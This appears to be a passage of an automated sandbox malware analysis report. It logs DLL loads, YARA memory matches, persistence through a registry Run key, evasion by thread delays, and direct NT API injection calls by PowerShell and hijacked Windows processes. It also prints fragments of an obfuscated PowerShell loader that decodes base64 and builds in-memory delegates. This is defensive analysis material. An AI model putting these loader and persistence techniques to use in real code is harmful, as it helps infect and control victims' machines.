Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: sti.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: sti.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: photobase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: portabledeviceapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: portabledevicetypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: wiatrace.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: sti.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: photobase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: atlthunk.dll	Jump to behavior

Source: Yara match	File source: 00000006.00000002.2604584716.000000000BF7B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2604475949.0000000008470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2974478300.000001681C8C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2596391958.0000000005982000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Downrushing)$global:Kvists = [System.Text.Encoding]::ASCII.GetString($Primers)$global:Tegneprocedurernes=$Kvists.substring(306944,26190)<#Despoiling Grundled Decrown Mucronation Gimp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Betvang $Headrig $Scripternes), (Meridional @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Nonoptimal = [AppDomain]::CurrentDomain.GetAssemblies()$global:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($omdefinering)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Organisationsmedlemmet, $false).DefineType($
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Downrushing)$global:Kvists = [System.Text.Encoding]::ASCII.GetString($Primers)$global:Tegneprocedurernes=$Kvists.substring(306944,26190)<#Despoiling Grundled Decrown Mucronation Gimp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848FF1A59 push edx; ret	2_2_00007FF848FF1A65
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848FF191B push esp; ret	2_2_00007FF848FF191C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848FF3444 pushfd ; iretd	2_2_00007FF848FF3445
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_073D0AB8 push eax; mov dword ptr [esp], ecx	6_2_073D0AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_073D08C2 push eax; mov dword ptr [esp], ecx	6_2_073D0AC4
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_0016C0CF push eax; ret	20_2_0016C0D1
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_001440E6 pushfd ; ret	20_2_001440E7
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_0014A35C push cs; ret	20_2_0014A35F
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_00158648 push edi; retf	20_2_00158670
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_0015C6EC push ss; iretd	20_2_0015C6EF
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_00162790 push edi; ret	20_2_0016279B
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_00162786 push edi; ret	20_2_0016279B
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_0015680C push ecx; iretd	20_2_0015680D
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046209AD push ecx; mov dword ptr [esp], ecx	23_2_046209B6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003B4050 push ebx; ret	23_2_003B4100
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003A40E6 pushfd ; ret	23_2_003A40E7
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003CC0CF push eax; ret	23_2_003CC0D1
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003AA35C push cs; ret	23_2_003AA35F
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003B8648 push edi; retf	23_2_003B8670
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003BC6EC push ss; iretd	23_2_003BC6EF
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003C2790 push edi; ret	23_2_003C279B
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003C2786 push edi; ret	23_2_003C279B
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003B680C push ecx; iretd	23_2_003B680D
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003BAA50 push ds; iretd	23_2_003BAAB8
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003BAA49 push ds; iretd	23_2_003BAAB8
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003BAAC3 push ds; iretd	23_2_003BAAB8
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003BCCB5 push edi; ret	23_2_003BCCB6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003B6CDC push cs; retf	23_2_003B6CF9
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003B5D6E push 0000004Ah; retf	23_2_003B5D9E
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003B5D6C push 0000004Ah; retf	23_2_003B5D9E
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003C1F5B push edx; ret	23_2_003C1F5C

Source: C:\Windows\SysWOW64\AtBroker.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VT_DR8YHH6			Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VT_DR8YHH6			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5301	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4574	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6480	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3388	Jump to behavior

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	API coverage: 0.5 %
Source: C:\Windows\SysWOW64\AtBroker.exe	API coverage: 3.0 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5248	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4112	Thread sleep count: 6480 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4112	Thread sleep count: 3388 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4052	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\AtBroker.exe	Last function: Thread delayed

Source: powershell.exe, 00000006.00000002.2599568793.0000000007214000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000014.00000002.2909299735.000000000061D000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000014.00000002.2912811575.000000000064A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.2993422765.0000016824A3A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWI

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtUnmapViewOfSection: Direct from: 0x76EF2D3C	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtProtectVirtualMemory: Direct from: 0x76EE7B2E	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtAllocateVirtualMemory: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtSetInformationThread: Direct from: 0x76EE63F9	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtClose: Direct from: 0x76EF2B6C
